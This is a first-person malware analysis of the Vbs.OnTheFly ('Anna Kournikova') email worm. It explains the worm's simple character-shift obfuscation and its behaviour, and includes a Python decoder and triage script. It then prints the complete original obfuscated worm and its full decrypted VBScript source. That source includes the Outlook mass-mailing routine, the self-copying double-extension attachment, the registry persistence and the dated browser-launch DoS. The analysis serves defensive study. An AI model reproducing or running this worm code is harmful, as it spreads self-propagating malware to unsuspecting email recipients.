I woke up today to find about three zillion copies of the Vbs.OnTheFly virus in my inbox. I can't believe people are still stupid enough to run attachments with ".vbs" extensions. Anyway, I set about decrypting the virus and figuring out what it does, so here are my results.
Basically, it's a very simple virus. The second line is an Execute statement whose string argument is the obfuscated worm body; the rest of the script is the decoder function that turns that string back into VBScript before Execute runs it. The "encryption" is trivial: the string is processed two characters at a time, each pair is swapped, and every character is shifted down by 2, except that the byte values 15, 16 and 17 stand in for newline, carriage return and space.
When you look at the decrypted code, you'll notice that it does five things:
- Writes a marker value under HKCU\software\OnTheFly\ in the registry. A second value, "mailed", is set to 1 once the mass-mailing routine has run, and that routine is skipped on later runs if it is present.
- Copies itself to AnnaKournikova.jpg.vbs in the Windows directory (GetSpecialFolder(0)). The double extension relies on Windows hiding the known ".vbs" extension so the attachment looks like a JPEG.
- Checks to see if it's January 26. If so, opens a browser on http://www.dynabyte.nl. This is a crude distributed DoS on that site (every infected machine opens the page on that day); it is not the home page of the virus author.
- Mails itself to every entry in every Outlook address list, with the subject "Here you have, ;o)" and AnnaKournikova.jpg.vbs attached.
- Reads its own source into memory and then sits in an endless Do...Loop, re-creating the script file whenever it is deleted.
In case you're curious, the string the regwrite call assembles from all those Chr() calls is "Worm made with Vbswg 1.50b". Vbswg is the worm-generator kit the script was built with; the trailing comment 'Vbswg 1.50b on both listings gives it away as well.
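The decoding step and the static triage described above, as an added example (this is my own Python, not the worm's code and not part of the original write-up). vbswg_decode is a straight port of the decoder function shown below; vbswg_encode is the inverse, included only so a test vector can be built without touching a real sample; extract_payload and summarize are my own helpers and the indicator regexes in summarize are assumptions tuned to this worm's strings. The sample payload at the bottom is constructed (a cut-down, non-functional body that reuses strings from the decoded listing) and is only decoded, never executed. One caveat: the 15/16/17 control bytes are non-printable, so the encoded listing as rendered on this page has lost them (there is no space byte between "nH" and "{" where the decoded text has "Fly Created"); the decoder has to be run on the actual attachment, not on a copy-paste of the page.

```python
import re
from typing import Dict, List, Optional

# Vbswg 1.50b substitutes these byte values for whitespace instead of
# shifting them by 2 like every other character (see the If/ElseIf chain
# in the worm's decoder function).
_CTRL_TO_CHAR = {15: "\n", 16: "\r", 17: " "}
_CHAR_TO_CTRL = {ch: code for code, ch in _CTRL_TO_CHAR.items()}


def _decode_char(c: str) -> str:
    code = ord(c)
    return _CTRL_TO_CHAR[code] if code in _CTRL_TO_CHAR else chr(code - 2)


def _encode_char(c: str) -> str:
    return chr(_CHAR_TO_CTRL[c]) if c in _CHAR_TO_CTRL else chr(ord(c) + 2)


def vbswg_decode(blob: str) -> str:
    """Port of the worm's decoder (e7iqom5JE4z): read the blob two characters
    at a time, decode each character, and emit the pair in swapped order.
    A trailing unpaired character is emitted on its own, as in the original."""
    out: List[str] = []
    for i in range(0, len(blob), 2):
        pair = [_decode_char(c) for c in blob[i:i + 2]]
        out.extend(reversed(pair))
    return "".join(out)


def vbswg_encode(text: str) -> str:
    """Inverse of vbswg_decode, used here only to build a test vector."""
    out: List[str] = []
    for i in range(0, len(text), 2):
        pair = [_encode_char(c) for c in text[i:i + 2]]
        out.extend(reversed(pair))
    return "".join(out)


# Matches the second line of a Vbswg script:  Execute <decoder>("<blob>")
# The blob never contains a double quote (a quote in the plaintext becomes '$').
_EXECUTE_RE = re.compile(r'\bExecute\s+\w+\s*\(\s*"([^"]*)"\s*\)')


def extract_payload(script: str) -> Optional[str]:
    """Pull the obfuscated string out of the Execute call and decode it."""
    m = _EXECUTE_RE.search(script)
    return vbswg_decode(m.group(1)) if m else None


def summarize(decoded: str) -> Dict[str, object]:
    """Cheap static triage of the decoded body: the indicators the write-up
    lists, pulled out with regexes (assumed patterns) rather than by running it."""
    return {
        "registry": re.findall(r'regwrite\s+"([^"]+)"', decoded, re.I),
        "dropped_files": re.findall(r'"\\([^"\\]+\.vbs)"', decoded, re.I),
        "urls": re.findall(r'"(https?://[^"]+)"', decoded, re.I),
        "uses_outlook": bool(re.search(r'CreateObject\("Outlook\.Application"\)', decoded, re.I)),
    }


# Constructed test vector: a cut-down, non-functional body reusing strings from
# the decoded listing. It is never executed, only encoded and decoded.
SAMPLE_PAYLOAD = (
    "'Vbs.OnTheFly Created By OnTheFly\r\n"
    "On Error Resume Next\r\n"
    'Set sh = CreateObject("WScript.Shell")\r\n'
    'sh.regwrite "HKCU\\software\\OnTheFly\\", "Worm made with Vbswg 1.50b"\r\n'
    'Set fso = CreateObject("scripting.filesystemobject")\r\n'
    'target = fso.GetSpecialFolder(0) & "\\AnnaKournikova.jpg.vbs"\r\n'
    'If month(now) = 1 And day(now) = 26 Then sh.run "Http://www.dynabyte.nl", 3, False\r\n'
    'Set ol = CreateObject("Outlook.Application")\r\n'
)
SAMPLE_SCRIPT = (
    "'Vbs.OnTheFly Created By OnTheFly\r\n"
    'Execute e7iqom5JE4z("' + vbswg_encode(SAMPLE_PAYLOAD) + '")\r\n'
    "'Vbswg 1.50b\r\n"
)

if __name__ == "__main__":
    body = extract_payload(SAMPLE_SCRIPT)
    print(body)
    print(summarize(body))
```

Running the script decodes the constructed sample and prints the registry path, dropped file name, URL and Outlook usage that the list above describes. Because the transform has no key, the same decoder works for anything the kit produced with these settings; only the random identifier names change from sample to sample.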
The original virus (linebreaks added to save your browser's sanity):
'Vbs.OnTheFly Created By OnTheFly
Execute e7iqom5JE4z("X)udQ0VpgjnH{tEcggvf{DQVpgjnH{QptGqt
tgTwugoPzgvUvgGQ9v58Jr7R6?EgtvcQgldeg*vY$eUktvrU0gjnn+
$9G5QJv786r0Rgtyiktgv$MJWEu^hqyvtc^gpQjVHg{n$^.jE*t9:+(
jE*t33+3(Etj3*63+(jE*t23+;(Etj5*+4(Etj3*;2+(jE*t9
;+(jE*t23+2(Etj3*32+(jE*t45+(jE*t33+;(Etj3*72+(jE
*t33+8(Etj3*62+(jE*t45+(jE*t8:+(jE*t:;+(jE*t33+7(
Etj3*;3+(jE*t23+5(Etj5*+4(Etj6*+;(Etj6*+8(Etj7*+5
(Etj6*+:(Etj;*+:gUvQtcyVopldi?7Egtvcqgldeg*vu$t
erkkviph0nkugu{gvqoldeg$v+tyQoclVip7de0rqh{nkguyterk0veukt
vrwhnncpgot.yQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwk
pqmcxl0irx0ud$kh9G5QJv786r0Rgtticgf$*MJWEu^hqyvtc^gpQjVHg
{no^kcgn$f+@>$$3vgjpgp4CUJ9inEN+*pgfhkhkopqj
vp*yq+3?cfpf{cp*yq+4?8jvpg9G5QJv786r0RwtpJ$vv<r11yy0y
{fcp{dgvp0$n5.h.ncgupgfhkgUvMLUiJy9M59?ztyQoclVi
p7dq0grvpzghvnk*guyterk0veuktvrwhnncpgo.+3P\L7\Mz6wk?XLiM
yUMJ99z5t0cgcfnnMLUiJy9M590znEuqgFqKhqPvt*yQocl
Vip7dh0nkggkzvu*uuyterk0veuktvrwhnncpgo++VgjpUvgWKg44:|6R
2x?QtcyVopldi07tecggvgvvzkhgny*euktvru0terkhvnwpnoc.gV
wt+ggW4K|4R:x602tyvk\g7PML6\kzXwgW4K|4R:x602nEuqgGfpK
hNqqrHpwveqkp4gUp9CnJNi*E+QptGqttgTwugoPzgvU
vgF54xQOzM8JT?EgtvcQgldeg*vQ$vwqnmqC0rrkncekvpq+$hKF54
xQOzM8JT?Q$vwqnmqV$gjpUvgl74PvD\h;n:F?54xQOzM8JTI0v
gcPgorUec*gO$RC$K+UvgUm834i35gN5?4lv7\P;D:h0nfCtfugNuukuv
qHtcGjeL4TRoOuD4ToKp8U4m33gi55NKhTLo4uR4OoD0Tf
CtfugGuvpktugE0wqvp>@2jVpg6fFDz5yi3xL?TLo4uR4OoD0TfCtf
ugGuvpktugE0wqvpqHt9Z;:cX|5gT?|3Vq6fFDz5yi3xLUv
gk9sd4:6x5\5?F54xQOzM8JTE0gtvcKggv*o+2gUvKQ6GXDl[LQ:?
TLo4uR4OoD0TfCtfugGuvpktugZ*:9X;5cT||g+k9sd4:6x5\5V0
q?KQ6GXDl[LQ0:fCtfuguk9sd4:6x5\5U0dwglve?$gJgt{wqjxc.g
=+q$k9sd4:6x5\5D0fq{?J$<k$(dxtehn($jEegmjVuk$
#(xednth($$guvYhpu:sI[h;?3sk496d5:5x0\vCcvjegovpuhuY
sp[:;I3hC0fftyQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMt
wkpqmcxl0irx0ud$k9sd4:6x5\5F0ngvgCgvhtgwUodvk?VwtgKhsk
496d5:5x0\qV>@$$Vgjpk9sd4:6x5\5U0pgfGQ9v58Jr7R6t
0igtyvkgJ$EM^WquvhcygtQ^VpgjnH^{conkfg.$$$3pGfhKgPvz
pGfhKgPvzpgfhkpGfwHepkvpqX)udiy370d2")
Function e7iqom5JE4z(hFeiuKrcoj3)
For I = 1 To Len(hFeiuKrcoj3) Step 2
StTP1MoJ3ZU= Mid(hFeiuKrcoj3, I, 1)
WHz23rBqlo7= Mid(hFeiuKrcoj3, I + 1, 1)
If Asc(StTP1MoJ3ZU) = 15 Then
StTP1MoJ3ZU= Chr(10)
ElseIf Asc(StTP1MoJ3ZU) = 16 Then
StTP1MoJ3ZU = Chr(13)
ElseIf Asc(StTP1MoJ3ZU) = 17 Then
StTP1MoJ3ZU = Chr(32)
Else
StTP1MoJ3ZU = Chr(Asc(StTP1MoJ3ZU) - 2)
End If
If WHz23rBqlo7<> "" Then
If Asc(WHz23rBqlo7) = 15 Then
WHz23rBqlo7= Chr(10)
ElseIf Asc(WHz23rBqlo7) = 16 Then
WHz23rBqlo7= Chr(13)
ElseIf Asc(WHz23rBqlo7) = 17 Then
WHz23rBqlo7= Chr(32)
Else
WHz23rBqlo7= Chr(Asc(WHz23rBqlo7) - 2)
End If
End If
e7iqom5JE4z = e7iqom5JE4z & WHz23rBqlo7 & StTP1MoJ3ZU
Next
End Function
'Vbswg 1.50b
The (rather easily) decrypted virus:
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set E7O3tH65p4P = CreateObject("WScript.Shell")
' the Chr() chain below spells "Worm made with Vbswg 1.50b"
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) _
& Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & _
Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & _
Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
e2nSA7HlgLC()
end if
if month(now) =1 and day(now) =26 then
E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close
' busy loop for the rest of the process lifetime: re-create the script file if it is deleted
Do
If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname, True)
UeI22z8P4v0.write ZN5JKZ4xiuV
UeI22z8P4v0.Close
End If
Loop
Function e2nSA7HlgLC()
On Error Resume Next
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH = "Outlook" Then
Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L
If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
iq72b483v3Z.To = OIE4BVYjOJ8.Address
iq72b483v3Z.Subject = "Here you have, ;o)"
iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
iq72b483v3Z.DeleteAfterSubmit = True
If iq72b483v3Z.To <> "" Then
iq72b483v3Z.Send
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b